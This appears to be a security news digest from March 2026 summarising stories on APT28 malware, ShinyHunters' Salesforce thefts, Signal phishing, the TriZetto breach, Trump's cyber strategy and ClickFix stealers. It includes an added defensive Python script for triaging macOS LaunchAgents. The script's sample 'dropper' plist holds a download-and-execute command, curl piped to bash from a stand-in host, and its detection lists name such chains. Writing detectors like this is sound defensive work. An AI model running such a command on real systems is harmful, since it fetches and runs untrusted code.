The Russian hacking group APT28 has been using two malware implants, BEARDSHELL and COVENANT, for long-term surveillance of Ukrainian military personnel since April 2024. BEARDSHELL executes PowerShell commands and utilizes Icedrive for command-and-control. COVENANT, a modified .NET post-exploitation framework, employs a new cloud-based protocol for C2. Additionally, APT28's SLIMAGENT malware logs keystrokes and captures screenshots, showing connections to earlier malware like XAgent.
2026-03-10 | Security Affairs: APT28 conducts long-term espionage on Ukrainian forces using custom malware
APT28 has been conducting long-term espionage on Ukrainian military personnel using custom malware, specifically BEARDSHELL and COVENANT, since April 2024. The group, linked to the Russian GRU, employs these tools for persistent access and data collection. BEARDSHELL utilizes ChaCha20-Poly1305 encryption and the Icedrive API, while SLIMAGENT captures screenshots and encrypts them with AES and RSA. The malware shows strong code similarities to earlier APT28 tools, indicating ongoing development and adaptation for espionage operations.
ShinyHunters claims more high-profile victims in latest Salesforce customers data heist
Date: 2026-03-09 | Source: The Register
ShinyHunters has reportedly stolen data from around 100 high-profile companies, including Salesforce, Snowflake, and LastPass, by exploiting misconfigured guest user profiles on Salesforce Experience Cloud sites. Salesforce confirmed that the issue stems from overly broad permissions rather than platform vulnerabilities. Recommendations include auditing guest user permissions, enforcing a least privilege model, and adjusting access settings to prevent unauthorized data exposure.
2026-03-10 | The Hacker News: Threat Actors Mass-Scan Salesforce Experience Cloud via Modified AuraInspector Tool
Salesforce reported increased threat actor activity exploiting misconfigurations in Experience Cloud sites using a modified AuraInspector tool. This custom tool extracts data by leveraging overly permissive guest user settings. Salesforce emphasized that no inherent platform vulnerabilities exist, but misconfigurations can lead to unauthorized data access. Recommendations include reviewing guest user settings, setting Default External Access to Private, and monitoring logs for unusual activity. The campaign may be linked to the ShinyHunters group.
2026-03-10 | Infosecurity Magazine: ShinyHunters Targets Hundreds of Websites in New Salesforce Campaign
Salesforce has alerted Experience Cloud customers to audit their website configurations following a campaign by the ShinyHunters threat group, which has reportedly stolen data from hundreds of companies. The group exploits misconfigured guest user settings to access sensitive data. Salesforce recommends auditing permissions, enforcing least privilege access, setting default external access to private, and reviewing logs for unusual access patterns. ShinyHunters claims to have compromised around 400 websites and 100 high-profile companies.
2026-03-10 | TechRadar: ShinyHunters claims it's behind ongoing Salesforce Aura data theft assault, warns more attacks to come
Infamous ransomware group ShinyHunters claims responsibility for a data theft campaign targeting Salesforce Aura, affecting around 100 high-profile organizations, including Snowflake, Okta, LastPass, and Sony. The attackers exploited misconfigured guest user permissions on Salesforce Experience Cloud instances, using a modified AuraInspector tool to identify vulnerabilities. Stolen data, including names and phone numbers, is reportedly being used for social engineering and voice phishing. Salesforce confirmed the issue is due to misconfigurations, not inherent vulnerabilities.
2026-03-10 | Security Affairs: Threat actors use custom AuraInspector to harvest data from Salesforce systems
Threat actors are using a modified AuraInspector tool to exploit misconfigurations in Salesforce Experience Cloud sites, allowing access to sensitive data. Salesforce warns that attackers are scanning public sites to find overly permissive guest user settings. The custom tool not only identifies vulnerabilities but also extracts data. Organizations are advised to review and secure their guest user settings to mitigate risks. The campaign is linked to the ShinyHunters group, known for targeting Salesforce environments.
2026-03-10 | Hack Read: ShinyHunters Hackers Threaten 400 Firms Over Stolen Salesforce Data
ShinyHunters has threatened around 400 organizations with data leaks unless their extortion demands are met, claiming to have accessed sensitive Salesforce Experience Cloud data. The hackers exploited overly permissive guest user settings, using a modified Aura Inspector tool. Salesforce asserts the issue stems from customer configurations, not platform flaws. Companies are advised to adopt a "least privilege" approach, restrict guest access, and disable public APIs to enhance security.
2026-03-11 | CSO Online: Overly permissive ‘guest’ settings put Salesforce customers at risk
Salesforce has alerted customers to review their Experience Cloud 'guest' configurations due to a data theft campaign by the cybercrime group ShinyHunters. The group claims to have breached hundreds of organizations, including around 400 websites and 100 high-profile companies, by exploiting overly permissive guest user settings. Salesforce's Cyber Security Operations Center is monitoring the situation, noting that attackers are using a modified version of the open-source tool Aura Inspector for mass scanning of affected sites.
2026-03-11 | Cyberscoop: Salesforce issues new security alert tied to third customer attack spree in six months
Salesforce issued a security alert regarding a series of attacks targeting its customers, attributed to the ShinyHunters threat group, which claims around 100 companies have been affected. The attacks exploit overly permissive guest user configurations on public-facing Experience Cloud sites. Salesforce emphasized that the issue is not due to a platform vulnerability and advised customers to restrict guest user settings. The threat actor is using a modified tool, AuraInspector, to scan for vulnerable instances.
2026-03-11 | Help Net Security: ShinyHunters claims new campaign targeting Salesforce Experience Cloud sites
Salesforce confirmed a new attack campaign by the ShinyHunters group targeting its Experience Cloud sites. Attackers are using a modified Aura Inspector tool to scan public sites and exploit excessive guest user permissions to access Salesforce CRM data. Salesforce recommends enforcing a "Least Privilege" access model, disabling public APIs, and reviewing guest user permissions. The group claims to have compromised around 100 companies, with stolen data typically including names and phone numbers for social engineering attacks.
OpenAI acquires Promptfoo to secure its AI agents
Date: 2026-03-09 | Source: TechCrunch
OpenAI has acquired Promptfoo, an AI security startup founded in 2024, to enhance the security of its AI agents. The integration will occur within OpenAI Frontier, its enterprise platform. Promptfoo develops tools for testing security vulnerabilities in large language models (LLMs) and is utilized by over 25% of Fortune 500 companies. The acquisition aims to enable automated red-teaming and improve risk monitoring. Financial details of the transaction were not disclosed.
2026-03-09 | Help Net Security: OpenAI to acquire AI security platform Promptfoo
OpenAI is acquiring Promptfoo, an AI security platform that assists enterprises in identifying and remediating vulnerabilities in AI systems during development. The integration will enhance OpenAI Frontier, focusing on security, compliance, and systematic testing of AI agents. Promptfoo's tools are trusted by over 25% of Fortune 500 companies, and the acquisition aims to bolster secure AI application deployment. OpenAI plans to continue the open-source project while enhancing enterprise capabilities within Frontier.
2026-03-10 | CSO Online: OpenAI to acquire Promptfoo to strengthen AI agent security testing
OpenAI plans to acquire Promptfoo to enhance security testing for AI agents as enterprises adopt autonomous systems. Promptfoo’s tools enable developers to test large language model applications against adversarial prompts, including prompt injection and jailbreak attempts, ensuring compliance with safety and reliability guidelines. OpenAI intends to integrate Promptfoo’s technology into OpenAI Frontier, its platform for developing and managing AI coworkers.
2026-03-10 | Cyber Security News: OpenAI to Acquire Promptfoo to Fix Vulnerabilities in AI Systems
OpenAI is acquiring Promptfoo, an AI security platform, to enhance the security of AI systems against vulnerabilities like prompt injection and jailbreaks. The integration into OpenAI Frontier will provide automated testing, workflow integration, and compliance features to help organizations manage AI-related security risks. Promptfoo's tools, trusted by over 25% of Fortune 500 companies, will enable systematic evaluation of AI agents, addressing critical vulnerabilities before deployment. The acquisition aims to strengthen governance and security in enterprise AI development.
2026-03-10 | Infosecurity Magazine: OpenAI's Promptfoo Deal Plugs Agentic AI Testing Gap
OpenAI has acquired Promptfoo to enhance security testing for its enterprise AI agents. Promptfoo, founded in July 2024, provides open-source tools for evaluating large language models and AI agents, addressing security gaps highlighted by experts. The integration will enable systematic testing, risk detection, and compliance oversight within OpenAI Frontier. The acquisition aims to automate security testing and improve accountability in AI development. Financial details were not disclosed, but Promptfoo's tools are used by over 25% of Fortune 500 companies.
Russian cybercrims phish their way into officials' Signal and WhatsApp accounts
Date: 2026-03-09 | Source: The Register
Russian-linked hackers are targeting government officials, journalists, and military personnel globally by phishing for access to their Signal and WhatsApp accounts. The Dutch intelligence agencies AIVD and MIVD report that attackers trick victims into sharing security codes, allowing them to read messages without breaching encryption. Victims include Dutch government employees. Authorities advise against using these apps for sensitive communications and have issued a cybersecurity advisory to assist affected users.
2026-03-09 | Security Affairs: Russia-linked hackers target Signal, WhatsApp of officials globally
Russia-linked hackers are targeting Signal and WhatsApp accounts of government and military officials globally, according to Dutch intelligence agencies MIVD and AIVD. The campaign aims to compromise accounts by tricking users into revealing verification codes and exploiting the "linked devices" feature. Recommendations include monitoring group chats for signs of compromise, reporting suspicious accounts, and verifying contacts through alternative channels. The advisory also outlines how to identify and respond to attacks.
2026-03-09 | Help Net Security: Russian hackers crack into officials’ Signal and WhatsApp accounts
Russian state hackers are targeting Signal and WhatsApp accounts of diplomats, military staff, and government officials globally, according to Dutch intelligence. Attackers trick users into revealing verification codes and PINs without exploiting technical vulnerabilities. They impersonate Signal support chatbots and misuse linked devices features. Users are advised to be cautious of duplicate identities in group chats, which may indicate account compromise. A cybersecurity advisory has been issued for affected individuals.
2026-03-09 | TechCrunch: Russian government hackers targeting Signal and WhatsApp users, Dutch spies warn
Russian government hackers are targeting Signal and WhatsApp users, particularly government officials and journalists, using phishing and social engineering techniques. They impersonate Signal's support team to request verification codes and PINs, allowing them to take over accounts. For WhatsApp, they exploit the "Linked devices" feature to access messages. Victims may not realize they have been compromised. Dutch intelligence warns that these tactics have been observed in the context of the Ukraine conflict.
2026-03-09 | Cyber Security News: Signal Confirms Targeted Phishing Attacks Resulting in Account Takeovers
Signal has confirmed targeted phishing attacks leading to account takeovers of high-profile users, including journalists and government officials. The attacks exploit user trust rather than technical vulnerabilities, with attackers impersonating trusted entities to harvest SMS verification codes and private Signal PINs. Signal warns users against sharing verification details and emphasizes that official support will never request such information. User vigilance and strict operational security practices are critical defenses against these threats.
2026-03-09 | Hack Read: Dutch Intel Warns of Russian Hackers Hijacking Signal, WhatsApp Attacks
On March 9, 2026, Dutch intelligence agencies AIVD and MIVD warned that Russian hackers are targeting Signal and WhatsApp accounts by impersonating support chatbots to obtain users' verification codes. This allows hackers to hijack accounts and read private messages. The apps' reputation for privacy makes them attractive targets. Users should watch for suspicious group member lists and unauthorized name changes. Experts emphasize that these apps are not suitable for sensitive communications, as compromised accounts can facilitate further attacks.
2026-03-10 | Infosecurity Magazine: Russian Hackers Target WhatsApp and Signal Accounts of Global Military and Government Officials
A campaign by Russian hackers targeting the encrypted messaging apps Signal and WhatsApp has been revealed by Dutch intelligence, affecting military and government officials. The attacks involve impersonating a 'Signal Support chatbot' to solicit verification codes and exploiting the linked devices feature. Dutch agencies advise against using these apps for sensitive information and provide guidance to identify malicious activities, such as duplicate contacts in group chats.
2026-03-10 | Malwarebytes Labs: Signal and WhatsApp accounts targeted in phishing campaign
Dutch intelligence services AIVD and MIVD report a phishing campaign by Russian state-backed hackers targeting Signal and WhatsApp accounts of high-value individuals, including officials and journalists. Attackers impersonate support accounts to trick users into revealing verification codes or linking malicious devices. Recommendations include never sharing verification codes, being cautious with links, regularly reviewing linked devices, using disappearing messages, and enabling multi-factor authentication to enhance security.
2026-03-10 | TechRadar: Russian cybercriminals are targeting WhatsApp, Signal accounts in 'large-scale global' hacking campaign
Russian state-sponsored hackers are conducting a large-scale cyber-espionage campaign targeting WhatsApp and Signal accounts of dignitaries, military personnel, and civil servants, as reported by the Dutch intelligence agency AIVD. The hackers use social engineering tactics to obtain security verification codes, often by spoofing support chatbots. AIVD warns that sensitive information has likely been accessed, advising against using these platforms for classified communications.
Cognizant TriZetto Data Breach Exposes Health Information of 3.4 Million Patients
Date: 2026-03-07 | Source: Cyber Security News
Cognizant's TriZetto experienced a data breach affecting 3.4 million patients, exposing sensitive health information. The breach involved unauthorized access to patient data, including names, addresses, dates of birth, and health insurance details. Cognizant has initiated an investigation and is notifying affected individuals. Recommendations include monitoring accounts for suspicious activity and utilizing identity theft protection services. The breach highlights vulnerabilities in healthcare data security practices.
2026-03-09 | Infosecurity Magazine: TriZetto Provider Solutions Breach Hits 3.4 Million Patients
A breach at TriZetto Provider Solutions (TPS) has compromised personal and health insurance information of over 3.4 million patients, as disclosed by the Maine Attorney General on October 2, 2025. Affected data includes names, addresses, Social Security numbers, and health insurance details. TPS has initiated investigations and implemented additional security measures, though specifics are unclear. They are offering credit monitoring services to those impacted. TPS is owned by Cognizant Technology Solutions, which has a history of security incidents.
2026-03-09 | Security Affairs: Cognizant’s TriZetto Provider Solutions data breach impacted over 3.4 million patients
A data breach at Cognizant’s TriZetto Provider Solutions affected over 3.4 million patients, exposing sensitive health data. Detected on October 2, 2025, the breach began in November 2024, involving unauthorized access to insurance eligibility records. Exposed data includes names, addresses, birth dates, Social Security numbers, and health insurance details, but not financial information. TriZetto is offering 12 months of free identity protection services and encourages vigilance against potential fraud.
2026-03-09 | TechRadar: TriZetto data breach: health tech giant reveals personal info of 3.4 million users may have been affected
TriZetto reported a data breach affecting approximately 3.4 million individuals, with unauthorized access occurring from November 2024 to October 2025. The breach involved sensitive patient and insurance records, including names, birth dates, Social Security numbers, and health insurance details. Payment data remained secure. TriZetto is offering free identity theft monitoring through Kroll and has notified affected individuals and the Maine Attorney General. OCHIN confirmed patient information was compromised.
OpenAI Launches Codex Security that Discover, Validate and Patch Vulnerabilities
Date: 2026-03-07 | Source: Cyber Security News
OpenAI has launched Codex Security, a tool designed to discover, validate, and patch vulnerabilities in software. This initiative aims to enhance security measures for developers by automating the identification of potential security flaws. Codex Security leverages advanced AI capabilities to streamline the vulnerability management process, ensuring that organizations can maintain robust security postures while minimizing manual intervention. Specific details on affected organizations or software were not provided.
2026-03-07 | The Hacker News: OpenAI Codex Security Scanned 1.2 Million Commits and Found 10,561 High-Severity Issues
OpenAI launched Codex Security, an AI-powered tool for identifying and fixing vulnerabilities, now in research preview for ChatGPT Pro, Enterprise, Business, and Edu users. In 30 days, it scanned 1.2 million commits, finding 792 critical and 10,561 high-severity issues in projects like OpenSSH and GnuTLS, including CVEs such as CVE-2026-24881. The tool enhances vulnerability detection by analyzing project context, validating findings, and proposing context-specific fixes, significantly reducing false positives.
2026-03-09 | Help Net Security: OpenAI joins the race in AI-assisted code security
OpenAI launched Codex Security, an AI tool designed to identify and help fix software vulnerabilities in codebases. Available in research preview for ChatGPT Pro, Enterprise, Business, and Edu customers, it previously operated in private beta. In the last 30 days, it scanned over 1.2 million commits, identifying 792 critical and 10,561 high-severity findings. The system uses a threat model for context, validates issues in sandboxed environments, and suggests patches to minimize regression risk.
2026-03-09 | CSO Online: OpenAI says Codex Security found 11,000 high-impact bugs in a month
OpenAI's Codex Security has identified over 11,000 high-severity and critical vulnerabilities in real-world codebases within its first month. The tool, designed to automatically detect, validate, and remediate flaws, found approximately 800 critical issues across more than a million commits. Unlike traditional scanners, Codex Security operates like a security researcher, mapping attack paths and proposing fixes, aiming to reduce alert fatigue for AppSec teams by focusing on realistically exploitable vulnerabilities.
2026-03-09 | TechRadar: OpenAI releases Codex Security to spot the next big cyber risks to your company, promises to 'identify complex vulnerabilities that other agentic tools miss'
OpenAI has launched Codex Security, a new tool for detecting high-impact software vulnerabilities while minimizing false positives and triage workload. This tool, now in research preview and free for one month, improves upon its predecessor, Aardvark, by providing high-confidence findings and actionable fixes. It aims to help security teams focus on significant vulnerabilities, enhancing the speed of secure code deployment. Future pricing details post-free trial remain undisclosed.
Trump’s new cybersecurity strategy makes promises but lacks details
Date: 2026-03-06 | Source: Cybersecurity Dive
The Trump administration's cybersecurity strategy emphasizes disrupting cyber threats, protecting critical infrastructure, and leveraging AI while reducing business regulations. It outlines six pillars but lacks implementation details. Key points include deterring foreign hackers, securing critical infrastructure, easing compliance burdens, and promoting AI and post-quantum cryptography. The strategy also aims to enhance the cybersecurity workforce and modernize federal networks with zero-trust architecture and AI solutions.
2026-03-06 | Cyberscoop: The long-awaited Trump cyber strategy has arrived
President Trump released a cyber strategy emphasizing offensive operations, securing federal networks, and enhancing the cybersecurity workforce. Key pillars include shaping adversary behavior, modernizing federal networks with technologies like post-quantum cryptography, and securing critical infrastructure. An executive order was signed to prioritize cybercrime prosecution and improve agency tools against international criminal organizations. While some praised the strategy's focus on deterrence and AI, critics noted its vagueness and lack of actionable plans.
2026-03-06 | CSO Online: Trump’s cyber strategy emphasizes offensive operations, deregulation, AI
The White House released President Trump's cybersecurity strategy, emphasizing offensive operations as central to US policy. Developed by the Office of the National Cyber Director, the seven-page document focuses on disrupting adversaries, deregulating industry, and accelerating AI adoption, while also addressing the defense of federal systems and critical infrastructure. This shift prioritizes offensive measures over traditional deterrence, garnering significant attention in the cybersecurity landscape.
2026-03-07 | Security Affairs: Reading White House President Trump’s Cyber Strategy for America (March 2026)
The White House released "President Trump’s Cyber Strategy for America," outlining a proactive approach to cybersecurity as a strategic domain. Key pillars include building a cyber workforce, shaping adversary behavior through offensive operations, promoting streamlined regulations, modernizing federal networks with zero-trust and AI, securing critical infrastructure, and sustaining technological superiority in AI and cryptography. The strategy emphasizes collaboration between government and private sectors to enhance resilience against cyber threats.
2026-03-09 | Risky.Biz: Risky Bulletin: New White House EO prioritizes fight against scams and cybercrime
US President Trump signed an executive order on Friday prioritizing the fight against foreign scams and cybercrime, directing the Attorney General to focus on cyber fraud, ransomware, and phishing. The order mandates a victim restoration program and calls for pressure on foreign governments harboring cybercriminals. Concurrently, a new Cyber Strategy emphasizes public-private partnerships for offensive cyber operations and AI integration in government cybersecurity efforts.
2026-03-09 | Recorded Future: White House floats Victims Restoration Program for millions affected by cyber fraud
The Trump administration's executive order aims to combat cyber fraud, directing multiple agencies to develop a plan within 120 days to disrupt transnational criminal organizations. A Victim Restoration Program will be established within 90 days to reimburse victims from seized funds. The order emphasizes improved coordination among federal agencies and potential sanctions against countries harboring cybercriminals. The FBI estimates cyber scams cost Americans $12.5 billion annually, highlighting the need for a comprehensive response.
2026-03-09 | Help Net Security: No more soft play, President Trump warns in new cyber strategy
The White House released “President Trump’s Cyber Strategy for America,” emphasizing a coordinated response to cyber threats. The strategy focuses on dismantling malicious networks, pursuing hackers, and imposing sanctions on foreign entities. Key initiatives include protecting AI infrastructure, simplifying cyber regulations, and modernizing federal information systems with best practices like zero-trust architecture. The strategy highlights the importance of a skilled cybersecurity workforce and warns that actions against U.S. interests will have consequences.
2026-03-09 | Infosecurity Magazine: Trump Administration Unveils New Cyber Strategy for America
A new national cyber strategy was released by the Trump Administration on March 6, 2026, focusing on enhancing US digital defenses and countering cyber threats. It outlines six policy pillars, among them shaping adversary behavior, modernizing federal networks, protecting critical infrastructure, and expanding the cybersecurity workforce. Experts emphasize the need for a budget and effective implementation mechanisms to support these priorities. The strategy aims for proactive measures, including offensive operations and private sector collaboration, to deter cyber attacks.
2026-03-09 | Cyberscoop: Sean Cairncross lays out what’s coming next for Trump’s cyber strategy
The Trump administration plans to establish an interagency body to address cyber threats, led by National Cyber Director Sean Cairncross. This initiative includes pilot programs for securing critical infrastructure in specific states and aims to enhance collaboration between government agencies like the DOJ, FBI, and Pentagon. Cairncross emphasized the need for private sector engagement and resource allocation. Additionally, there are plans for an academy to address cybersecurity workforce shortages and initiatives to foster innovation through a foundry and accelerator.
2026-03-09 | TechRadar: ‘American Power will finally stand up in cyberspace’: Trump unveils new cyber strategy he says will “deploy the full suite of US government defensive and offensive cyber operations”
President Trump has unveiled the National Cyber Strategy, outlining plans to combat cybercrime through six pillars: shaping adversary behavior, promoting common-sense regulation, modernizing federal networks, securing critical infrastructure, sustaining superiority in AI, and building cyber talent. The strategy emphasizes proactive responses to cyber threats, including potential real-world actions. It aims to enhance cybersecurity practices, reduce reliance on foreign technology, and foster innovation within the US.
2026-03-09 | Recorded Future: New White House cyber strategy pledges to ease regulations, ‘impose costs’ on bad actors
The White House's National Cyber Strategy emphasizes offensive cyber actions against criminal networks and adversarial governments while pledging to reduce cybersecurity regulations. It aims to enhance federal defenses, incentivize private sector collaboration, and elevate cybersecurity in leadership. The strategy includes pilot programs for critical infrastructure and focuses on securing AI technologies. National Cyber Director Sean Cairncross highlighted the need for a unified cyber workforce strategy and indicated future documents detailing action items are forthcoming.
2026-03-09 | Cybersecurity Dive: Trump administration will test infrastructure cybersecurity approaches in pilot program
The Trump administration is initiating pilot programs to test cybersecurity technologies in critical infrastructure sectors, including the water sector in Texas, the beef industry in South Dakota, and rural hospitals. National Cyber Director Sean Cairncross emphasized the need for rapid deployment of effective solutions tailored to specific states and industries, rather than a one-size-fits-all approach. The administration is inviting states and businesses to participate in these pilot programs.
Anthropic’s Claude found 22 vulnerabilities in Firefox over two weeks
Date: 2026-03-06 | Source: TechCrunch
Anthropic discovered 22 vulnerabilities in Firefox during a security partnership with Mozilla, with 14 classified as "high-severity." Most issues were addressed in Firefox 148, released in February, while some fixes are pending for future updates. The team utilized Claude Opus 4.6 over two weeks, focusing on the complex codebase. Although successful in identifying vulnerabilities, they struggled to create proof-of-concept exploits, achieving success in only two instances despite spending $4,000 in API credits.
2026-03-06 | The Register: Firefox taps Anthropic AI bug hunter, but rancid RAM still flipping bits
Mozilla's collaboration with Anthropic's AI surfaced 22 Firefox vulnerabilities, 14 of them high-severity, which have been assigned CVEs and fixed. Separately, about 10-15% of Firefox crashes are attributed to hardware faults such as bit flips from faulty memory: of 470,000 crash reports Mozilla received, some 25,000 may be linked to such memory errors. While AI aids vulnerability detection, hardware errors remain outside Mozilla's control, an ongoing device-reliability risk.
2026-03-07 | The Hacker News: Anthropic Finds 22 Firefox Vulnerabilities Using Claude Opus 4.6 AI Model
Anthropic discovered 22 vulnerabilities in Firefox, including 14 high-severity, during a partnership with Mozilla. The vulnerabilities were identified in January 2026 and addressed in Firefox 148. Notably, a use-after-free bug was found in just 20 minutes. The AI model, Claude Opus 4.6, was more effective at finding vulnerabilities than exploiting them, successfully creating exploits for only two out of hundreds of tests. Mozilla reported that this AI-assisted approach has led to the discovery of 90 additional bugs, enhancing security analysis.
2026-03-09 | Security Affairs: Anthropic Claude Opus AI model discovers 22 Firefox bugs
Anthropic's Claude Opus 4.6 identified 22 vulnerabilities in Firefox, most of them high-severity, which Mozilla addressed in Firefox 148 (released in February 2026; the bugs were found in January). The model found issues quickly, producing 112 unique reports across nearly 6,000 C++ files. It struggled to exploit what it found, yielding working exploits in only two cases, but the speed of discovery is itself a signal of what AI brings to offensive security. Mozilla noted that AI-assisted analysis has since uncovered 90 additional bugs.
2026-03-09 | TechRadar: Anthropic says it found a heap of Firefox security flaws using new Claude tools, says 'AI is making it possible to detect severe security vulnerabilities at highly accelerated speeds'
Anthropic's Claude Opus 4.6 identified 22 security flaws in Mozilla's Firefox, with 14 classified as high severity. The analysis, conducted over two weeks, scanned nearly 6,000 C++ files. Mozilla addressed most vulnerabilities in Firefox 148, with others slated for future releases. Anthropic claims Opus 4.6 demonstrates accelerated vulnerability detection, reasoning about code similarly to human researchers, and finding issues without specialized tools.
Fake CleanMyMac site installs SHub Stealer and backdoors crypto wallets
Date: 2026-03-06 | Source: Malwarebytes Labs
A fake CleanMyMac site (cleanmymacos[.]org) installs SHub Stealer, a macOS malware that steals sensitive data, including passwords and cryptocurrency wallet information. The malware is delivered via a Terminal command, bypassing macOS protections. It checks for Russian keyboard settings to avoid infecting users in CIS countries. SHub also modifies wallet applications to exfiltrate credentials. Users are advised to avoid running suspicious commands, check for malicious files, and change compromised passwords.
2026-03-09 | Hack Read: Fake CleanMyMac Site Uses ClickFix Trick to Install SHub Stealer on macOS
A fraudulent website impersonating CleanMyMac is tricking macOS users into installing SHub Stealer, a credential-stealing malware. Victims are instructed to run a Terminal command that bypasses macOS protections. The malware avoids Russian devices and collects system information, while also prompting users for their system password under false pretenses. It modifies cryptocurrency wallets to steal recovery phrases and installs a persistent task for ongoing communication with attackers. Users are advised to download software only from official sources.
2026-03-09 | TechRadar: 'macOS is becoming a more attractive target, and the tools attackers use are becoming more capable and more professional': Experts warn 'convincing' fake CleanMyMac installs target Apple users to empty crypto wallets
A fake CleanMyMac utility is spreading SHub infostealer malware targeting macOS users. The campaign involves a spoofed website that tricks users into executing terminal commands to install the malware, bypassing standard protections. SHub steals credentials, crypto wallet data, and establishes persistence by replacing legitimate apps with malicious versions. It also installs a LaunchAgent to allow remote command execution on the infected Mac.
2026-03-09 | Cyber Security News: Hackers Use Fake CleanMyMac Site to Deploy SHub Stealer and Hijack Crypto Wallets
A fake website, cleanmymacos[.]org, is distributing the SHub Stealer malware, targeting macOS users. This malware harvests sensitive data, including passwords and cryptocurrency wallet files. It uses a method called ClickFix to bypass macOS defenses. SHub uniquely backdoors popular cryptocurrency wallets like Exodus and Trezor Suite, exfiltrating credentials to a specific endpoint. Users who interacted with the site should delete malicious files and change passwords immediately.
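All four SHub summaries above agree on the persistence and tampering side of the infection: a LaunchAgent that keeps a channel to the operators open, and legitimate wallet applications replaced or modified. Persistence artifacts are the part a responder can check in minutes. The following added example is mine, not Malwarebytes' or any vendor's tooling: it parses LaunchAgent property lists with plistlib and flags the traits a ClickFix-delivered agent tends to have (an interpreter or downloader as the program, inline shell code, a payload in a temp or hidden directory, an Apple-looking label outside Apple's paths, and RunAtLoad combined with KeepAlive or StartInterval). The sample plists are constructed, the heuristics are assumptions to tune against your own fleet, and the wallet check shells out to codesign, so it only does anything on a Mac.

```python
"""Triage ~/Library/LaunchAgents for ClickFix-style persistence. Added example;
the plists below are constructed and the heuristics are assumptions to tune."""
import plistlib
import subprocess
from pathlib import Path

# Programs a dropped agent tends to run directly instead of a signed app binary.
INTERPRETERS = {"sh", "bash", "zsh", "osascript", "python", "python3", "perl"}
LOADERS = INTERPRETERS | {"curl", "nohup", "base64", "launchctl"}
# Staging locations: world-writable or shared directories (hidden dirs checked separately).
SUSPECT_DIRS = ("/tmp/", "/private/tmp/", "/var/tmp/", "/Users/Shared/")
CHAIN_TOKENS = ("curl ", "| sh", "| bash", "| zsh", "base64 -d", "base64 --decode", "eval ")


def triage_launch_agent(plist):
    """Return the reasons an agent deserves a look (empty list = nothing seen)."""
    reasons = []
    args = [str(a) for a in plist.get("ProgramArguments", [])] or \
        ([str(plist["Program"])] if "Program" in plist else [])
    if not args:
        return ["no Program or ProgramArguments: agent is inert or malformed"]
    exe_path, exe = Path(args[0]), Path(args[0]).name
    joined = " ".join(args)
    if exe in LOADERS:
        reasons.append(f"program is an interpreter/downloader: {exe}")
    if exe in INTERPRETERS and any(flag in args[1:] for flag in ("-c", "-e")):
        reasons.append("inline script passed on the command line")
    if any(tok in joined for tok in CHAIN_TOKENS):
        reasons.append("download/decode/eval chain in arguments")
    if any(d in joined for d in SUSPECT_DIRS) or any(p.startswith(".") for p in exe_path.parts):
        reasons.append("program lives in a temp, shared or hidden directory")
    label = str(plist.get("Label", ""))
    if label.startswith("com.apple.") and not args[0].startswith(("/System/", "/usr/")):
        reasons.append(f"Apple-looking label {label} runs a non-Apple path")
    if plist.get("RunAtLoad") and (plist.get("KeepAlive") or plist.get("StartInterval")):
        reasons.append("runs at login and is kept alive or polled: beaconing-style persistence")
    return reasons


def scan_launch_agents(directory=None):
    """Triage every plist in a LaunchAgents directory (XML and binary alike)."""
    directory = Path(directory) if directory else Path.home() / "Library" / "LaunchAgents"
    report = {}
    for path in sorted(directory.glob("*.plist")):
        try:
            report[str(path)] = triage_launch_agent(plistlib.loads(path.read_bytes()))
        except Exception as exc:  # an unparseable plist is itself worth a look
            report[str(path)] = [f"unparseable plist: {exc}"]
    return report


def wallet_bundle_tampered(app_path):
    """True if codesign rejects the bundle. Modified files break a bundle's
    signature unless the attacker re-signs it. macOS only (shells out)."""
    proc = subprocess.run(["codesign", "--verify", "--deep", "--strict", str(app_path)],
                          capture_output=True, text=True)
    return proc.returncode != 0


# Constructed samples: a normal helper, a ClickFix-style dropper, a hidden payload.
SAMPLES = {
    "benign": b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.updater</string>
  <key>ProgramArguments</key><array>
    <string>/Applications/Example.app/Contents/MacOS/ExampleHelper</string>
    <string>--check</string></array>
  <key>RunAtLoad</key><true/>
</dict></plist>""",
    "dropper": b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.apple.softwareupdate.helper</string>
  <key>ProgramArguments</key><array>
    <string>/bin/bash</string><string>-c</string>
    <string>curl -fsSL http://example.invalid/t | bash</string></array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict></plist>""",
    "hidden": b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.user.sync</string>
  <key>ProgramArguments</key><array>
    <string>/Users/Shared/.cache/sync</string></array>
  <key>RunAtLoad</key><true/>
  <key>StartInterval</key><integer>300</integer>
</dict></plist>""",
}


def triage_samples():
    """Run the heuristics over the constructed plists: {name: reasons}."""
    return {name: triage_launch_agent(plistlib.loads(data)) for name, data in SAMPLES.items()}


if __name__ == "__main__":
    for name, reasons in triage_samples().items():
        print(name, reasons or "clean")
```

Expect false positives from legitimate tooling that also runs `/bin/sh -c` from a LaunchAgent; the point is to shorten the list a responder reads by hand, and to pair it with `wallet_bundle_tampered()` on Exodus, Trezor Suite and the other wallets the reporting names.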
Microsoft Reveals ClickFix Campaign Using Windows Terminal to Deploy Lumma Stealer
Date: 2026-03-06 | Source: The Hacker News
Microsoft disclosed a ClickFix campaign, observed in February 2026, that uses Windows Terminal to deploy Lumma Stealer. Victims are instructed to open Windows Terminal, sidestepping detections tuned to the Run dialog used by earlier ClickFix lures, and to paste a hex-encoded command that starts a multi-stage chain: downloading payloads, establishing persistence, and exfiltrating data. Lumma Stealer harvests credentials from browser artifacts. A second delivery path uses a batch script, which the report ties to EtherHiding techniques.
2026-03-06 | Security Affairs: Microsoft warns of ClickFix campaign exploiting Windows Terminal to deliver Lumma Stealer
Microsoft warns of a ClickFix campaign that uses Windows Terminal to deliver Lumma Stealer through social engineering. The campaign, discovered in February 2026, guides users to launch Terminal with Windows + X → I, bypassing detections built around the Run dialog, and tricks them into executing hex-encoded commands that download and run malicious payloads, leading to credential theft from browsers. Microsoft Defender provides guidance on defending against this campaign.
2026-03-06 | The Register: Microsoft spots ClickFix campaign getting users to self-pwn on Windows Terminal
A new ClickFix scam targets Windows users by tricking them into launching Windows Terminal and executing a malicious command that installs the Lumma infostealer. This campaign, identified by Microsoft Threat Intelligence, began in February and uses social engineering tactics to convince users to paste commands under the guise of troubleshooting. The attack can establish persistence, modify Microsoft Defender settings, and steal credentials from browsers like Chrome and Edge.
2026-03-06 | Cyber Security News: New ClickFix Attack leverages Windows Terminal for Payload Execution
